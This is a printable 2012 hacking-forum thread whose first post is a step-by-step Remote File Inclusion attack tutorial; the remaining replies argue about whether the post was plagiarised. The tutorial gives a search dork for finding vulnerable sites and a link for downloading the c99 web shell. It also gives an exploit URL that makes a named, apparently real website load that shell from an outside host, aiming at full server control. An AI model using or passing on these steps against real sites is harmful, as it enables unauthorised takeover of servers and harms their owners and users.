Sinisterly
RFI (Remote File Inclusion) - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: RFI (Remote File Inclusion) (/Thread-RFI-Remote-File-Inclusion)

Pages: 1 2


RFI (Remote File Inclusion) - princeshama - 03-30-2012

Remote File Inclusion is the most common vulnerability found in many web servers. If the remote file execution is performed successfully, we can get control over the server and make it execute any command of our wish. So how exactly we can do that?

First we need to know the websites which are vulnerable to this, using the following google dork:

“inurl:index.php?page=”

We get number of websites listed of the form:

www.Targetsite.com/index.php?page=Anything

One by one, in place of anything, type http://www.google.com, as shown below:

http://www.Targetsite.com/index.php?page=http://www.google.com

If the above link opens up the google homepage, then it implies the website is completely vulnerable to Remote File Inclusion.

The next step is to download a shell out of several available on the web, which is nothing but a payload in php. Most common are the c99 or r57. c99 shell can be downloaded from

http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=763782

Upload the shell to a webhosting site such as ripway.com, 110mb.com etc. Now you get to see the link to this shell as:

http://h1.ripway.com/abhi/c99.txt

or something similar to this depending upon site on which the shell has been hosted.

The successful google homepage was seen in http://www.Targetsite.com/index.php?page=http://www.google.com as I mention earlier, right? Now just remove the google part and paste the link to your shell as shown:

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/abhi/c99.txt?

Remember, the ‘?’ at the end is an important part, or the shell will not execute. So try this out, you get a complete complete control panel access to the web server. Quite easy and very much interesting.



RE: FI (Remote File Inclusion) - TheShadow1 - 03-30-2012

Eh. I think you should give credit to the guy who made this:
http://thecybersaviours.com/hacking-a-website-through-remote-file-inclusion


RE: FI (Remote File Inclusion) - LoneDevil - 03-31-2012

Even if you do not know the exact site you took some thing from if it is not your work at-least say "not made by me credit goes to the creator who I do not know"


RE: FI (Remote File Inclusion) - abhi435 - 04-02-2012

Hahaha! That was my article...! Owner and admin of TheCybersaviours. Smile

At least like the post and become a fan before you copy any post..


RE: FI (Remote File Inclusion) - 1llusion - 04-03-2012

(04-02-2012, 11:36 AM)abhi435 Wrote: Hahaha! That was my article...! Owner and admin of TheCybersaviours. Smile

At least like the post and become a fan before you copy any post..

Please send me full link to the original if you believe this is C/P. I will deal with it, thank you!
Best Regards
1llusion


RE: FI (Remote File Inclusion) - abhi435 - 04-03-2012

(04-03-2012, 02:52 PM)1llusion Wrote:
(04-02-2012, 11:36 AM)abhi435 Wrote: Hahaha! That was my article...! Owner and admin of TheCybersaviours. Smile

At least like the post and become a fan before you copy any post..

Please send me full link to the original if you believe this is C/P. I will deal with it, thank you!
Best Regards
1llusion

The full link to my website is http://thecybersaviours.com/hacking-a-website-through-remote-file-inclusion

And please don't ban the user. At least he reached my website. THanks for your care.. Smile



RE: FI (Remote File Inclusion) - princeshama - 04-05-2012

u have any prof its ur site how i can believe on u


RE: FI (Remote File Inclusion) - abhi435 - 04-05-2012

(04-05-2012, 09:51 AM)princeshama Wrote: u have any prof its ur site how i can believe on u

How can I prove it?? Any suggestions?? Go http://thecybersaviours.com, add a comment anywhere on the website, if it shows up, proved! Because it wont show up unless I approve it. Right?

Now take your decision, I do not need to prove who I am.

Thanks


RE: FI (Remote File Inclusion) - princeshama - 04-06-2012

hahahaha lo funy may be admin wil not aprove comment


RE: FI (Remote File Inclusion) - abhi435 - 04-07-2012

(04-06-2012, 10:07 AM)princeshama Wrote: hahahaha lo funy may be admin wil not aprove comment

hahaha... lol... if i am the admin... i ll add your this username along with your comment there... now use ur brain somewhere else dude... gud day Smile